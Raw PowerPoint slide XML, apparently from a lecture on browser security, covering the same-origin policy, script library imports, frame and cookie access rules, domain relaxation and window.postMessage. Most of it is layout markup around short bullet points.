        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276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3325" name="Picture 11" descr="CompaqAlphaServerES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255838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6" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4954588" y="4743450"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13327" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4432300" y="2967038"/>
            <a:ext cx="488950" cy="3032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8" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4242594" y="3899694"/>
            <a:ext cx="1028700" cy="10017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Cloud Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2778125"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -200975"/>
              <a:gd name="adj2" fmla="val 175085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pic>
        <p:nvPicPr>
          <p:cNvPr id="13330" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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252913"/>
            <a:ext cx="14366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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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Network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Interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Content Placeholder 4" descr="gmail-ch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524000"/>
            <a:ext cx="8001000" cy="4833938"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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8A1FAB6-8AD0-4CCD-882B-A9FAE9926EE2}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>30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Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327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Safe to visit an evil web site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Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allow safe delegation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32772" name="Picture 3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3100" y="207010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94335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 descr="b.co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0200" y="394335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6" descr="ifram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3900" y="541020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ym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Content Placeholder 2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 = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full access to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Full network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read/write DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Storage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Assumptions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5672138" y="4183063"/>
            <a:ext cx="2057400" cy="1724025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4275" y="2403475"/>
            <a:ext cx="93662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1088" y="4416425"/>
            <a:ext cx="1143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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5891212" y="3486151"/>
            <a:ext cx="1668463" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37620"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="33800" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6357938" y="2125663"/>
            <a:ext cx="787400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Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5878513" y="5500688"/>
            <a:ext cx="1763712" cy="33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Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3840163" y="5418138"/>
            <a:ext cx="1371600" cy="1147762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380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6713" y="5486400"/>
            <a:ext cx="760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3804" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="6211888"/>
            <a:ext cx="1282700" cy="246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i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33805" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4937125" y="4822825"/>
            <a:ext cx="1028700" cy="8699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360738"/>
            <a:ext cx="503238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Library import</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3481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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=https://seal.verisign.com/getseal?host_name=a.com&gt;&lt;/script&gt;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1900" dirty="0" smtClean="0"/>
              <a:t>Script has privileges of imported page, NOT source server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Can script other pages in this origin, load more scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Other forms of importing</a:t>
            </a:r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/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:cs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200" dirty="0" smtClean="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4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73350"/>
            <a:ext cx="37592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0" y="3359150"/>
            <a:ext cx="1079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/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="3522663"/>
            <a:ext cx="11461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charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>VeriSign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10800000" flipH="1" flipV="1">
            <a:off x="5302250" y="3798888"/>
            <a:ext cx="1739900" cy="315912"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="54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2950" y="3586163"/>
            <a:ext cx="8128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rgbClr val="FFFFFF">
                <a:alpha val="50000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8950" y="3852863"/>
            <a:ext cx="1041400" cy="649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4826" name="Picture 10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5780088"/>
            <a:ext cx="1041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20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4773613" y="5780088"/>
            <a:ext cx="8588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32" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect l="48813"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5740400" y="5867400"/>
            <a:ext cx="8128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13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5867400"/>
            <a:ext cx="715963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Components of browser security policy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Frame-Frame relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>canScript(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>canNavigate(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can Frame A change the origin of content for Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Frame-principal relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>readCookie(A,S), writeCookie(A,S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can Frame A read/write cookies from site S?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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 2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Origin: scheme, host, (port), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>hasSetDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="2819400" cy="1722438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75" y="1960563"/>
            <a:ext cx="93662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6325" y="2976563"/>
            <a:ext cx="1143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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3242714">
            <a:off x="2507456" y="2634457"/>
            <a:ext cx="1482725" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37719"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1581150"/>
            <a:ext cx="2497138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www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36873" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3065463" y="4060825"/>
            <a:ext cx="2497137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www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3471863"/>
            <a:ext cx="2057400" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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pic>
        <p:nvPicPr>
          <p:cNvPr id="3687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581400"/>
            <a:ext cx="7620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76" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="4306888"/>
            <a:ext cx="1816100" cy="246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600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36877" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2392363" y="3581400"/>
            <a:ext cx="1223962" cy="30480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26" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3405188"/>
            <a:ext cx="2286000" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F8DD6C"/>
              </a:gs>
              <a:gs pos="20000">
                <a:srgbClr val="F4DB6E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BBA753"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E9D57C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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36879" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6032500" y="4229100"/>
            <a:ext cx="1939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Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36880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471863"/>
            <a:ext cx="7620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8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0975" y="2073275"/>
            <a:ext cx="93662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82" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1676400"/>
            <a:ext cx="241300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 i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6510338" y="2759075"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1862138" y="2759075"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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  <a:sym typeface="Helvetica Neue Light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4705350" y="3657600"/>
            <a:ext cx="1309688" cy="32702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665413" y="3459163"/>
            <a:ext cx="655637" cy="601662"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36889" name="Straight Connector 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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6890" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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096000" y="4210050"/>
            <a:ext cx="1792288" cy="361950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facebook.com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065463" y="4060825"/>
            <a:ext cx="2497137" cy="36195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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com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window.postMessage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915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New API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Supported in latest betas of many browsers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>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>A network-like channel between frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 62" descr="saf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819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64" descr="firef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1940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5" descr="ope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819400"/>
            <a:ext cx="533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130" descr="ie-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2819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10" descr="chrome-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3925" y="2819400"/>
            <a:ext cx="549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8400" y="4495800"/>
            <a:ext cx="1676400" cy="20034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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Right Arrow 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4953000"/>
            <a:ext cx="1905000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49989"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add a contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="Right Arrow 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4343400" y="5773738"/>
            <a:ext cx="1828800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49946"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Share contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268413" y="4419600"/>
            <a:ext cx="6961187" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect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38925" name="Picture 28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5445125"/>
            <a:ext cx="1752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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3200400"/>
            <a:ext cx="7772400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990600" y="1920875"/>
